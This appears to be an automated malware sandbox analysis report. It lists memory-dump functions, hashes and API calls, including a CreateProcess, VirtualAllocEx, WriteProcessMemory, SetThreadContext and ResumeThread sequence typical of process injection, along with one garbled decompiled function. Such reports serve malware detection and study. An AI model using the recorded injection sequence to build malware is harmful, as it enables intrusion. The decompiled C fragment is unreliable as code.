                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 7c65fe713ed5fbb995c199b7913ecac9649e50d25382fb3d26c4708727610064
                                                                              • Instruction ID: 5771578a3b1555e17270650c26393a8b90620918d38a10daedc01110dc1f103b
                                                                              • Opcode Fuzzy Hash: 7c65fe713ed5fbb995c199b7913ecac9649e50d25382fb3d26c4708727610064
                                                                              • Instruction Fuzzy Hash: E6915971D002198FEF20CFA4C8417EEBBB2BF49314F15856AD849A7384DB749985CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 001D3D68
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 537dfc1f60af2c71dc066c9830479d41694e73fc4de7c515eaf8d83108aaf617
                                                                              • Instruction ID: 632f80e71413ad6a855fb60e3c4768b4f213531844d2eee318ecafec14029f8b
                                                                              • Opcode Fuzzy Hash: 537dfc1f60af2c71dc066c9830479d41694e73fc4de7c515eaf8d83108aaf617
                                                                              • Instruction Fuzzy Hash: F62126B19002499FCB10CFA9C884BDEBBF5FF49314F54882AE959A7340D7789A50CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 001D3D68
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 66454be64ed135e144464f588e46d6eaac1e1232e8f884ae51dc33a1b8185992
                                                                              • Instruction ID: f17735658a916866c44e25074e9b097aeacb5dbf6fa3b4e8cbd37e4224cc8300
                                                                              • Opcode Fuzzy Hash: 66454be64ed135e144464f588e46d6eaac1e1232e8f884ae51dc33a1b8185992
                                                                              • Instruction Fuzzy Hash: EC2128719002499FCB10CFA9C8847DEBBF5FF49314F50882AE959A7340D7789A50CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001D35BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: c9413aa115afbfb16ff6d8172e291b29b6e3e6023d4011c187a92541bd6b7f3b
                                                                              • Instruction ID: e7628ee4cb4d7504dea79b5b5395b8183e75dff27a1277336fd59328e3737ed2
                                                                              • Opcode Fuzzy Hash: c9413aa115afbfb16ff6d8172e291b29b6e3e6023d4011c187a92541bd6b7f3b
                                                                              • Instruction Fuzzy Hash: 0F211A719002098FDB10CFA9D8847EEBBF5EF49314F54882AD459A7340D778AA45CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001D35BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: a14adf4444a2daf54341b4fdbd0129670ae12a46f13cfb046072cdb9f4810af4
                                                                              • Instruction ID: dc78b7452360b4bb4ba4a31d9b20a64d252dc3cf5e41eb95eab2cdc119e06ae0
                                                                              • Opcode Fuzzy Hash: a14adf4444a2daf54341b4fdbd0129670ae12a46f13cfb046072cdb9f4810af4
                                                                              • Instruction Fuzzy Hash: EE2118719002098FDB10CFAAD8847EEBBF5EF49314F54882AD459A7340DB78AA45CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D4048
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 4c4d694938e0ef903ecaca99b99d068667b79482666dffe8f96f06026e60971e
                                                                              • Instruction ID: 21044f94d6ecc6c0bb2327e11765c481e0fc11a037c782411ef373cff4080320
                                                                              • Opcode Fuzzy Hash: 4c4d694938e0ef903ecaca99b99d068667b79482666dffe8f96f06026e60971e
                                                                              • Instruction Fuzzy Hash: 9A21F8719002099FCB10CFA9D844BEEFBF5FF48314F50882AE959A7240D779A951CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: c7583da43513c29a3e332910103e8a28a71656f74212bb3b0394956000f4c053
                                                                              • Instruction ID: 6a40b074b3403f7ccbec69556d130c76587b45c39d271ec13bb714a7746c2e98
                                                                              • Opcode Fuzzy Hash: c7583da43513c29a3e332910103e8a28a71656f74212bb3b0394956000f4c053
                                                                              • Instruction Fuzzy Hash: 522167719002088FCB10DFAAD8447DEBBF4EF99314F24881AD459A7340C779A544CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D3A86
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 7cfcdd81e576d887f88f213b8ce586b938cc0ffb67199b2a26757746eb1edf5a
                                                                              • Instruction ID: 3f7e1b0c1fb4fa9c429351b40b0dd20f0e4ad5224605c1e1501ea0bb522a7fd7
                                                                              • Opcode Fuzzy Hash: 7cfcdd81e576d887f88f213b8ce586b938cc0ffb67199b2a26757746eb1edf5a
                                                                              • Instruction Fuzzy Hash: FC2136729002099FCB10CFA9D844BEEBBF5EF89314F14881AE559B7250C779A950CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D3A86
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 0c691295b33e3c923dd2efb2cf9811ca81a78a9bcc658c9d6224f8fd888d5cbe
                                                                              • Instruction ID: 03533587e3a78acb318cde17ac939ea708033ff32e289e2055bad53245f0b797
                                                                              • Opcode Fuzzy Hash: 0c691295b33e3c923dd2efb2cf9811ca81a78a9bcc658c9d6224f8fd888d5cbe
                                                                              • Instruction Fuzzy Hash: 8F1126719002099BCB10DFA9D844BDFBBF9EF89314F14881AD559B7250C775AA50CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: acf5ac28f321d13c71880c69a901e30d21fd8c86bc7f6c730ffebc99d9775c3a
                                                                              • Instruction ID: 39eafa248ce1051d8e8be5e0a5be9ebeadd0e5d92640e152d1e9be7110154d78
                                                                              • Opcode Fuzzy Hash: acf5ac28f321d13c71880c69a901e30d21fd8c86bc7f6c730ffebc99d9775c3a
                                                                              • Instruction Fuzzy Hash: C41125B19002098BCB10DFAAD8447EFFBF9AB89314F24881AC419B7340C779A940CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              C-Code - Quality: 79%
                                                                              			E011E415D(signed int __eax, void* __ebx, signed char __ecx, void* __edi, signed int __esi) {
                                                                              				signed char _t187;
                                                                              				signed char _t188;
                                                                              				signed char _t223;
                                                                              				signed char _t227;
                                                                              				signed char _t228;
                                                                              				signed int _t230;
                                                                              				signed char _t265;
                                                                              				void* _t295;
                                                                              				signed int _t296;
                                                                              				void* _t304;
                                                                              				void* _t313;
                                                                              				void* _t323;
                                                                              				void* _t324;
                                                                              				void* _t325;
                                                                              				void* _t353;
                                                                              
                                                                              				_t304 = __edi;
                                                                              				_t265 = __ecx;
                                                                              				_t187 = __eax;
                                                                              				asm("sbb eax, [ecx]");
                                                                              				 *((intOrPtr*)(__edi + __esi + 9)) =  *((intOrPtr*)(__edi + __esi + 9)) + __eax;
                                                                              				_t230 = __ebx + __ecx;
                                                                              				asm("popfd");
                                                                              				 *__eax =  *__eax + __eax;
                                                                              				_t324 = _t323 + 1;
                                                                              				asm("aaa");
                                                                              				if ( *__eax <= 0) goto L1;
                                                                              				 *((intOrPtr*)(__ecx + 0x34)) =  *((intOrPtr*)(__ecx + 0x34)) + _t230;
                                                                              				asm("aad 0x9d");
                                                                              				 *__eax =  *__eax + __eax;
                                                                              				_t325 = _t324 + 1;
                                                                              				asm("aaa");
                                                                              				if( *__eax >= 0) {
                                                                              					 *__eax =  *__eax + __eax;
                                                                              					asm("sbb eax, [edx+0x36a101e1]");
                                                                              					 *__eax =  *__eax + __eax;
                                                                              					_t187 = __eax /  *__ecx;
                                                                              					_t296 = __eax %  *__ecx;
                                                                              					 *((intOrPtr*)(_t313 + 0x1a)) =  *((intOrPtr*)(_t313 + 0x1a)) + _t325;
                                                                              					 *_t187 =  *_t187 + _t187;
                                                                              					 *_t187 =  *_t187 + _t187;
                                                                              					_t309 =  *(__ecx + _t230 * 8) * 0;
                                                                              				}
                                                                              				_t188 = _t187 ^ 0x000000d9;
                                                                              				 *((intOrPtr*)(_t313 + 0x1a)) =  *((intOrPtr*)(_t313 + 0x1a)) + _t188;
                                                                              				 *_t188 =  *_t188 + _t188;
                                                                              				if( *_t188 >= 0) {
                                                                              					L6:
                                                                              					 *_t188 =  *_t188 + _t188;
                                                                              					if ( *_t188 < 0) goto L9;
                                                                              				} else {
                                                                              					_t227 = _t265;
                                                                              					_t265 = _t188;
                                                                              					 *((intOrPtr*)(_t230 + 0x6b0000ef)) =  *((intOrPtr*)(_t230 + 0x6b0000ef)) + _t313;
                                                                              					_t228 = _t227 ^ 0x00000049;
                                                                              					 *((intOrPtr*)(_t230 + 0x64)) =  *((intOrPtr*)(_t230 + 0x64)) + _t296;
                                                                              					 *_t228 =  *_t228 + _t228;
                                                                              					_t188 = _t228 &  *(_t296 + 0x1b830189);
                                                                              					 *_t188 =  *_t188 + _t188;
                                                                              					_t353 = _t325 + 1;
                                                                              					asm("aaa");
                                                                              					if( *_t188 >= 0) {
                                                                              						 *_t188 =  *_t188 + _t188;
                                                                              						 *((intOrPtr*)(_t296 - 0x622afe77)) =  *((intOrPtr*)(_t296 - 0x622afe77)) - _t188;
                                                                              						 *_t188 =  *_t188 + _t188;
                                                                              						_t325 = _t353 + 1;
                                                                              						asm("aaa");
                                                                              						_t295 = _t265 - 1;
                                                                              						 *((intOrPtr*)(_t313 - 0x58fffee5)) =  *((intOrPtr*)(_t313 - 0x58fffee5)) + _t295;
                                                                              						_push(_t230);
                                                                              						_t265 = _t295 - 1;
                                                                              						 *((intOrPtr*)(_t304 + 0x7000011b)) =  *((intOrPtr*)(_t304 + 0x7000011b)) + _t296;
                                                                              						goto L6;
                                                                              					}
                                                                              				}
                                                                              				_t223 = _t188 ^ 0x000000c9;
                                                                              			}


















                                                                              0x011e415d
                                                                              0x011e415d
                                                                              0x011e415d
                                                                              0x011e415d
                                                                              0x011e415f
                                                                              0x011e4163
                                                                              0x011e4165
                                                                              0x011e4166
                                                                              0x011e4168
                                                                              0x011e4169
                                                                              0x011e416c
                                                                              0x011e416f
                                                                              0x011e4174
                                                                              0x011e4176
                                                                              0x011e4178
                                                                              0x011e4179
                                                                              0x011e417c
                                                                              0x011e417e
                                                                              0x011e4180
                                                                              0x011e4186
                                                                              0x011e4188
                                                                              0x011e4188
                                                                              0x011e418b
                                                                              0x011e418e
                                                                              0x011e4196
                                                                              0x011e4198
                                                                              0x011e4198
                                                                              0x011e4199
                                                                              0x011e419b
                                                                              0x011e419e
                                                                              0x011e41a0
                                                                              0x011e41d6
                                                                              0x011e41d6
                                                                              0x011e41d8
                                                                              0x011e41a2
                                                                              0x011e41a2
                                                                              0x011e41a2
                                                                              0x011e41a3
                                                                              0x011e41a9
                                                                              0x011e41ab
                                                                              0x011e41ae
                                                                              0x011e41b0
                                                                              0x011e41b6
                                                                              0x011e41b8
                                                                              0x011e41b9
                                                                              0x011e41bc
                                                                              0x011e41be
                                                                              0x011e41c0
                                                                              0x011e41c6
                                                                              0x011e41c8
                                                                              0x011e41c9
                                                                              0x011e41ca
                                                                              0x011e41cb
                                                                              0x011e41d1
                                                                              0x011e41d2
                                                                              0x011e41d3
                                                                              0x00000000
                                                                              0x011e41d3
                                                                              0x011e41bc
                                                                              0x011e41d9

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, Offset: 011E0000, based on PE: true
                                                                              • Associated: 00000004.00000002.2106809144.00000000011E0000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000004.00000002.2106842204.000000000121E000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 46c58cbfb7a7aba6251415c08de0a13ee486db393ad025042cdec919c20b2927
                                                                              • Instruction ID: 3fb45a7a72c32739aa291f62c0d1d53d559a555c81b18216c059d371d52225b2
                                                                              • Opcode Fuzzy Hash: 46c58cbfb7a7aba6251415c08de0a13ee486db393ad025042cdec919c20b2927
                                                                              • Instruction Fuzzy Hash: C191917244E7C14FD7478B74886A1917FB0AF2322871A55EFC4C0CF8A3E25A9956C762
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Executed Functions

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 002294DB
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: 0d3116d68bcefb74585de199dba68866f5bbc25034da6271ae2bdf6e01ed732e
                                                                              • Instruction ID: 9abf388eb90402bce7feaf7caf32eb2ed81be039c6cc3313e99bf04a62ceb3d4
                                                                              • Opcode Fuzzy Hash: 0d3116d68bcefb74585de199dba68866f5bbc25034da6271ae2bdf6e01ed732e
                                                                              • Instruction Fuzzy Hash: C39214B4A142289FCB25EF70D89479DB7BABF88305F1084E9D50AA7258CB719EC1CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 002294DB
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: f9424f2e08fadbf137b5bfd04e55edfa074be098a6b9311de03bdca692bf22ea
                                                                              • Instruction ID: 157d31d281ded7e3c256b19c4460526f2a7ee1185671f398044fa37563ac4ad5
                                                                              • Opcode Fuzzy Hash: f9424f2e08fadbf137b5bfd04e55edfa074be098a6b9311de03bdca692bf22ea
                                                                              • Instruction Fuzzy Hash: 49523474A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: 10537fdf75a618808e5641aeeb8d1afac402bec93b836a92079100c30b5037b9
                                                                              • Instruction ID: 22316ec51e39e4d7046c12b81e6b79d94ff50c5f574f50ff7451965df35a2d04
                                                                              • Opcode Fuzzy Hash: 10537fdf75a618808e5641aeeb8d1afac402bec93b836a92079100c30b5037b9
                                                                              • Instruction Fuzzy Hash: A1422474A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: ddbd4186f6cea86419620544d29f91151134df7468bfa0939d906c04942f33a7
                                                                              • Instruction ID: c74b6a5f48d5c7c8e9af7fed7c59919b70baca3e4f18a657ddfd8480e9ce2b41
                                                                              • Opcode Fuzzy Hash: ddbd4186f6cea86419620544d29f91151134df7468bfa0939d906c04942f33a7
                                                                              • Instruction Fuzzy Hash: 8D422574A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: b8e88a56700b63a10b153797a897b27e20a0681325c349a7e061fc3cc84b2ca8
                                                                              • Instruction ID: cb200572807752d927743771ed7ff949f642047825127f668e0af860f8af677d
                                                                              • Opcode Fuzzy Hash: b8e88a56700b63a10b153797a897b27e20a0681325c349a7e061fc3cc84b2ca8
                                                                              • Instruction Fuzzy Hash: E0422574A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: b4a45ec1d2edfe41347be4729799c5628b1790647497c77bf1cebcf6273925c6
                                                                              • Instruction ID: 2648550a58438ad25b6e11fbf88e8130915c3af503fe179e8439f81ed7d785a1
                                                                              • Opcode Fuzzy Hash: b4a45ec1d2edfe41347be4729799c5628b1790647497c77bf1cebcf6273925c6
                                                                              • Instruction Fuzzy Hash: D7422574A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: 546a4e31a89e9275f8967186af8cf818c699e0158097ab11ca5aab899a146f93
                                                                              • Instruction ID: eff03a5a98fce65e7b8dbe5cbfa519502983687c077e865e1eb3b7796ab7e1ac
                                                                              • Opcode Fuzzy Hash: 546a4e31a89e9275f8967186af8cf818c699e0158097ab11ca5aab899a146f93
                                                                              • Instruction Fuzzy Hash: E0422674A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: 58cd23c40513824443ac8af5be20a7aaf2df2a5baad908d22f41072627e40f46
                                                                              • Instruction ID: dbf66fa1a177c1f351504a4bf93157be7051c27b688564f125e6cafb32d3f727
                                                                              • Opcode Fuzzy Hash: 58cd23c40513824443ac8af5be20a7aaf2df2a5baad908d22f41072627e40f46
                                                                              • Instruction Fuzzy Hash: 9C422674A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7254CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: 9ebc4f211e1ac7fb82cb8b73a40d1d542213b5ca203fc810973335abd9c831bf
                                                                              • Instruction ID: 78431ce81b4d34de884ef13c8888aa3b1a78df8585472d7fd2f403cd92ca755e
                                                                              • Opcode Fuzzy Hash: 9ebc4f211e1ac7fb82cb8b73a40d1d542213b5ca203fc810973335abd9c831bf
                                                                              • Instruction Fuzzy Hash: 18322674A14228DFCB28EF70D89879DB7BABF88305F1084E9D50AA7254CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: eed6eeff929aab0c2510bcf2db300695877c1b160732c399dd56fd1786355e7c
                                                                              • Instruction ID: 42e1d5fd9cdaea2bfc34e5e965acb73cbb0abd2d660bc5690ac518b5f327577c
                                                                              • Opcode Fuzzy Hash: eed6eeff929aab0c2510bcf2db300695877c1b160732c399dd56fd1786355e7c
                                                                              • Instruction Fuzzy Hash: F7322574A14228DFCB28EF70D89879DB7BABF88305F1084E9D50AA7254CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0022975E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DispatcherExceptionUser
                                                                              • String ID:
                                                                              • API String ID: 6842923-0
                                                                              • Opcode ID: 0de9490f76c55b2770bdf2b34c0e9e1b09c45098d8db7da5c3c934a3dc1bfd25
                                                                              • Instruction ID: e09cfdc0ff28f578f0fb9fd7d9d274fbb58d86129ac53179e5b198f21fbd2bc2
                                                                              • Opcode Fuzzy Hash: 0de9490f76c55b2770bdf2b34c0e9e1b09c45098d8db7da5c3c934a3dc1bfd25
                                                                              • Instruction Fuzzy Hash: 47322674A14228DFCB28EF70D89879DB7BABF88305F1084E9D50AA7254CB719E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0022DFC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 9b04ce3977833c5debb2dfcc305296612a23e70a99efea80fe882a189e70bcfe
                                                                              • Instruction ID: 7b33ebea65ee56da88a26b15e9701c089ca9a9066efdac048a3beb56f560034d
                                                                              • Opcode Fuzzy Hash: 9b04ce3977833c5debb2dfcc305296612a23e70a99efea80fe882a189e70bcfe
                                                                              • Instruction Fuzzy Hash: 3E4174B0E142599FCB11CFE9D884A9EBFF2AF48310F25846AE808EB255C3719805CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0022DFC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 7eff5573adfeda67c969488607e44f3ce0c42590f518db5ec33d758ee862f911
                                                                              • Instruction ID: 01521aa9b1d758716e03a8a92db599a1cb23eabc8a67ee811fb6a71478dcabf3
                                                                              • Opcode Fuzzy Hash: 7eff5573adfeda67c969488607e44f3ce0c42590f518db5ec33d758ee862f911
                                                                              • Instruction Fuzzy Hash: DF31E2B1D10258AFCB20CFDAD584A9EBBF5BF48710F15842AE819AB214C7B19945CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3f7fac265b0831911771f997b3210a4f67312f9b2ac64996166288d242fb586
                                                                              • Instruction ID: ac24f49c00326a402abe4b32f9f5cc2c87341f5b1c10fc0860d7eda641ab7516
                                                                              • Opcode Fuzzy Hash: c3f7fac265b0831911771f997b3210a4f67312f9b2ac64996166288d242fb586
                                                                              • Instruction Fuzzy Hash: 11213775600244DFCB05DF10F9C0B26BFB6FB98328F24C569E8050B246C376E866CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 132a0a12eb1df3790efda76f2a69e05aa0c0af02317c167e37e14536fc01e4f3
                                                                              • Instruction ID: 0929ac2b5fe68f444bb83bd108d09041e00bec9e9c4482d185ce42a063ab47e8
                                                                              • Opcode Fuzzy Hash: 132a0a12eb1df3790efda76f2a69e05aa0c0af02317c167e37e14536fc01e4f3
                                                                              • Instruction Fuzzy Hash: 66213475204244DFDB15CF50F9C4B2ABFA5FB98318F3485A9E8090B246C336E866CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348871566.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
                                                                              • Instruction ID: 849c282c8d2675e6d3403bf423ad6d707d402cfc61910d265b18eed8a96a33a4
                                                                              • Opcode Fuzzy Hash: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
                                                                              • Instruction Fuzzy Hash: 9221F275604204DFDB18CF60F984B16BBA5FB88B14F24C9A9E8494B346C336D847CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2348871566.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c24aba548d23e8ec98c32d49a2a053aeaa8926af7a48f3c5599024fc60fcdaa4
                                                                              • Instruction ID: 5ef8cea63552cef73d2a1819bdc5b6f7434c58812657d1807f9d5e79a9d48def
